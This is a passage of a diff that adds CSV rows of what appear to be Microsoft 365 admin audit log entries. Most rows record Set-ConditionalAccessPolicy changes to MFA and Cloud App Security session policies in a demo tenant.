+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T06:18:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/25/2020 6:18:02 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:33:09Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:33:04 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:33:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:33:03 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:42:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:42:53 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:42:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:42:53 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:48:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:48:56 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:18:23Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ffa04e8b-d571-444b-9e99-eab9a6eacbc9""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:18:22 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:18:22Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ffa04e8b-d571-444b-9e99-eab9a6eacbc9""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:18:21 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:12:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\77ef108d-66cc-4170-b084-e23986231beb""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""203b278f-5449-4f77-a847-60fe5e707ead\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:12:06 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test 2 Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:18:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:40:12.7394779Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:18:34 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:26:01Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:26:01 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:26:06Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:26:05 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T19:25:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T19:24:16.8281546Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 7:25:23 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T16:35:24Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""d1e0a488-f243-4a0b-a06a-be4529770691""
+  }
+]"
+2020-03-26T18:28:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:05:39.4231761Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:28:50 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:25:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ffa04e8b-d571-444b-9e99-eab9a6eacbc9""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:25:53 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:55:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\77ef108d-66cc-4170-b084-e23986231beb""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""203b278f-5449-4f77-a847-60fe5e707ead\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:55:04 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test 2 Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:53:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:40:12.7394779Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:53:49 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-03-26T18:42:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-03-26T18:40:12.7394779Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""3/26/2020 6:42:09 PM""
